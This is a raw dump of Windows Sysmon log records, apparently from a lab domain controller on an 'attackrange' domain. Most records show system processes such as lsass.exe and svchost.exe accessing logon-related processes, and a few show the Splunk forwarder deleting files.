12:24:43.673{42DC5269-CE96-6086-0B00-00000000BA01}6286328C:\Windows\system32\lsass.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440856Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.673{42DC5269-CE96-6086-0B00-00000000BA01}6286328C:\Windows\system32\lsass.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440855Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.673{42DC5269-CE96-6086-0B00-00000000BA01}6286328C:\Windows\system32\lsass.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440854Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.673{42DC5269-CE96-6086-0B00-00000000BA01}6286328C:\Windows\system32\lsass.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440853Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.672{42DC5269-CE96-6086-0B00-00000000BA01}6286328C:\Windows\system32\lsass.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440852Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.663{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA921CED170F6B5D797DBDD460D540E1,SHA256=A496C404814D295E14C2636571AFEDA5415D97086D4F24D7CE7481501DE28E3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440851Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.656{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8970DE6F3955025A9967683B27ED8CB,SHA256=77DE631D4A3ADF2806F35EEFF3C6527356907668D14E300FFD2B0D446CFF1C0B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440850Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.654{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CE96-6086-0B00-00000000BA01}628C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440849Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.652{42DC5269-CE96-6086-0B00-00000000BA01}6286328C:\Windows\system32\lsass.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440848Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.651{42DC5269-CE96-6086-0B00-00000000BA01}6286328C:\Windows\system32\lsass.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440847Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.650{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440846Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.650{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440845Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.650{42DC5269-CE96-6086-0B00-00000000BA01}6286328C:\Windows\system32\lsass.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440844Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.649{42DC5269-CE96-6086-0B00-00000000BA01}6286328C:\Windows\system32\lsass.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440843Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.626{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1200-00000000BA01}480C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440842Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.625{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1200-00000000BA01}480C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440841Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.625{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1200-00000000BA01}480C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440840Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.600{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C428-00000000BA01}6416C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440839Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.599{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C428-00000000BA01}6416C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440838Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.599{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C428-00000000BA01}6416C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440837Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.599{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C428-00000000BA01}6416C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440836Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.599{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C428-00000000BA01}6416C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440835Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.599{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C428-00000000BA01}6416C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440834Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.599{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C428-00000000BA01}6416C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440833Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.598{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C428-00000000BA01}6416C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.